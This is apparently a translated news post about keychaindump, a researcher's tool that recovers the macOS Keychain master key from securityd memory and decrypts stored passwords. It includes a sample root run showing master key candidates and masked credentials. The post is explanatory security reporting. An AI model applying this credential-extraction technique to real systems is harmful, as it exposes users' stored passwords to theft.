Isolation of passwords in MAC OS X - evolution of malware?

    Finnish researcher Juuso Salonen has published a special utility ( http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain ), the purpose of which is to extract passwords from the Keychain password management subsystem. Keychaindump has already attracted the attention of researchers who are convinced that this approach can be successfully used to develop malicious code for MAC OS X.
    For the first time, it was introduced in MAC OS 8.6. Keychain stores various types of password information (forms for WEB-sites, FTP, SSH-accounts, access to network "balls", wireless networks, digital certificates). Keychain

    Filesstored in ~ / Library / Keychains /, / Library / Keychains /, and / Network / Library / Keychains / respectively. “Login”, the default Keychain file, automatically unlocks immediately after a successful user login to the system with its user password. However, the real password to it may not differ from what is used by the user. At the same time, it is not allowed to set a zero password, automatic blocking is carried out over time during prolonged downtime of the system.

    image
    image

    As soon as the user unlocks keychain, the password turns into a 24-byte “master key” and is stored in the memory segment of the “securityd” process. Through a separate study, a specific stored structure was identified in the memory area that points to the “master key”. It contains a field of size 8 bytes with the corresponding value "0x18" (24 in HEX). By obtaining the “master key”, there is the possibility of disclosing the so-called “wrapping key”. By decrypting it, it becomes possible to obtain stored passwords in clear text. The researcher believes that this vulnerability is the use of loopholes of the OS architecture itself. The main problem is that the root can read the keychains of other users, and the search for the “master key” and “wrapping key” themselves is quite primitive. More details:

    $ sudo ./keychaindump
    [*] Searching process 15 heap range 0x7fa809400000-0x7fa809500000
    [*] Searching process 15 heap range 0x7fa809500000-0x7fa809600000
    [*] Searching process 15 heap range 0x7fa809600000-0x7fa809700000
    [*] Searching process 15 heap range 0x7fa80a900000-0x7fa80ac00000
    [*] Found 17 master key candidates
    [*] Trying to decrypt wrapping key in /Users/juusosalonen/Library/Keychains/login.keychain
    [*] Trying master key candidate: b49ad51a672bd4be55a4eb4efdb90b242a5f262ba80a95df
    [*] Trying master key candidate: 22b8aa80fa0700605f53994940fcfe9acc44eb1f4587f1ac
    [*] Trying master key candidate: 1d7aa80fa0700f002005043210074b877579996d09b70000
    [*] Trying master key candidate: a0a20000000200f7474d400000700d01a980fa00007f085e
    [*] Trying master key candidate: 180000000000000000000000000000000000000007000001
    [*] Trying master key candidate: 0000b107000001000000803e970aa8710ae567eff7ff0000
    [*] Trying master key candidate: 796a63507e6c2a84d9f095fae2896058dfe029cd0f7105da
    [*] Trying master key candidate: 16ac866d636215c01e337e942f48cfed12d7c45bfab8dbf7
    [*] Trying master key candidate: 070020539baab0d1d6a3aa80fa006877ed57f80fa0000000
    [*] Trying master key candidate: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
    [+] Found master key: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
    [+] Found wrapping key: e9acc39947f1996df940fceb1f458ac74b877579f54409b7
    xxxxxxx:192.168.1.1:xxxxxxx
    xxxxxxx:news.ycombinator.com:xxxxxxx
    xxxxxxx@gmail.com:login.facebook.com:xxxxxxx
    xxxxxxx@gmail.com:smtp.google.com:xxxxxxx
    xxxxxxx@gmail.com:imap.google.com:xxxxxxx
    xxxxxxx@gmail.com:api.heroku.com:xxxxxxx
    xxxxxxx:www.freechess.org:xxxxxxx
    xxxxxxx:twitter.com:xxxxxxx
    xxxxxxx@gmail.com:www.google.com:xxxxxxx
    xxxxxxx:imap.gmail.com:xxxxxxx




    http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

    Also popular now: